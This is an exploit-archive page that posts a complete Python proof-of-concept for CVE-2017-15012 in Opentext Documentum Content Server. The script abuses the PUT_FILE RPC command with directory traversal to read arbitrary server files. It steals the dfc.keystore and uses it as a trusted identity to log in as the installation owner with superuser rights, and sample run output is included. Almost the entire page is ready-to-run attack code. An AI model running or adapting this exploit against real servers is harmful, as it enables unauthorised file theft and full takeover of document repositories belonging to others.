Home / exploitsPDF  

Opentext Documentum Content Server File Hijack / Privilege Escalation

Posted on 15 October 2017

#!/usr/bin/env python # Opentext Documentum Content Server (formerly known as EMC Documentum Content Server) # does not properly validate input of PUT_FILE RPC-command which allows any # authenticated user to hijack arbitrary file from Content Server filesystem, # because some files on Content Server filesystem are security-sensitive # the security flaw described above leads to privilege escalation # # The PoC below demonstrates this vulnerability: # # MacBook-Pro:~ $ python CVE-2017-15012.py # usage: # CVE-2017-15012.py host port user password # MacBook-Pro:~ $ python CVE-2017-15012.py docu72dev01 10001 dm_bof_registry dm_bof_registry # Trying to connect to docu72dev01:10001 as dm_bof_registry ... # Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377 Linux64.Oracle # Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh # Trying to find any object with content... # Downloading /u01/documentum/cs/shared/config/dfc.keystore # Trying to find any object with content... # Trying to connect to docu72dev01:10001 as dmadmin ... # Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377 Linux64.Oracle # P0wned! # # import socket import sys from os.path import basename from dctmpy.docbaseclient import DocbaseClient, NULL_ID from dctmpy.identity import Identity from dctmpy.obj.typedobject import TypedObject CIPHERS = "ALL:aNULL:!eNULL" def usage(): print "usage: %s host port user password" % basename(sys.argv[0]) def main(): if len(sys.argv) != 5: usage() exit(1) (session, docbase) = create_session(*sys.argv[1:5]) if is_super_user(session): print "Current user is a superuser, nothing to do" exit(1) admin_console = session.get_by_qualification( "dm_method where object_name='dm_JMSAdminConsole'") env_script = admin_console['method_verb'] env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh') keystore_path = None script = str(download(session, env_script, bytearray())) if not script: print "Unable to download dm_set_server_env.sh" exit(1) for l in script.splitlines(): if not l.startswith("DOCUMENTUM_SHARED"): continue keystore_path = l.split('=')[1] break if not keystore_path: print "Unable to determine DOCUMENTUM_SHARED" exit(1) keystore_path += "/config/dfc.keystore" keystore = str(download(session, keystore_path, bytearray())) if not keystore: print "Unable to download dfc.keystore" exit(1) (session, docbase) = create_session( sys.argv[1], sys.argv[2], session.serverconfig['r_install_owner'], "", identity=Identity(trusted=True, keystore=keystore)) if is_super_user(session): print "P0wned!" def download(session, path, buf): print "Downloading %s" % path print "Trying to find any object with content..." object_id = session.query( "SELECT FOR READ r_object_id " "FROM dm_sysobject WHERE r_content_size>0") .next_record()['r_object_id'] session.apply(None, NULL_ID, "BEGIN_TRANS") store = session.get_by_qualification("dm_filestore") format = session.get_by_qualification("dm_format") remote_path = "common=/../../../../../../../../../..%s=Directory" % path result = session.put_file(store.object_id(), remote_path, format.object_id()) full_size = result['FULL_CONTENT_SIZE'] ticket = result['D_TICKET'] content_id = session.next_id(0x06) obj = TypedObject(session=session) obj.set_string("OBJECT_TYPE", "dmr_content") obj.set_bool("IS_NEW_OBJECT", True) obj.set_int("i_vstamp", 0) obj.set_id("storage_id", store.object_id()) obj.set_id("format", format.object_id()) obj.set_int("data_ticket", ticket) obj.set_id("parent_id", object_id) if not session.save_cont_attrs(content_id, obj): raise RuntimeError("Unable to save content object") handle = session.make_puller( NULL_ID, store.object_id(), content_id, format.object_id(), ticket ) if handle == 0: raise RuntimeError("Unable make puller") for chunk in session.download(handle): buf.extend(chunk) return buf def create_session(host, port, user, pwd, identity=None): print "Trying to connect to %s:%s as %s ..." % (host, port, user) session = None try: session = DocbaseClient( host=host, port=int(port), username=user, password=pwd, identity=identity) except socket.error, e: if e.errno == 54: session = DocbaseClient( host=host, port=int(port), username=user, password=pwd, identity=identity, secure=True, ciphers=CIPHERS) else: raise e docbase = session.docbaseconfig['object_name'] version = session.serverconfig['r_server_version'] print "Connected to %s:%s, docbase: %s, version: %s" % (host, port, docbase, version) return (session, docbase) def is_super_user(session): user = session.get_by_qualification( "dm_user WHERE user_name=USER") if user['user_privileges'] == 16: return True group = session.get_by_qualification( "dm_group where group_name='dm_superusers' " "AND any i_all_users_names=USER") if group is not None: return True return False if __name__ == '__main__': main()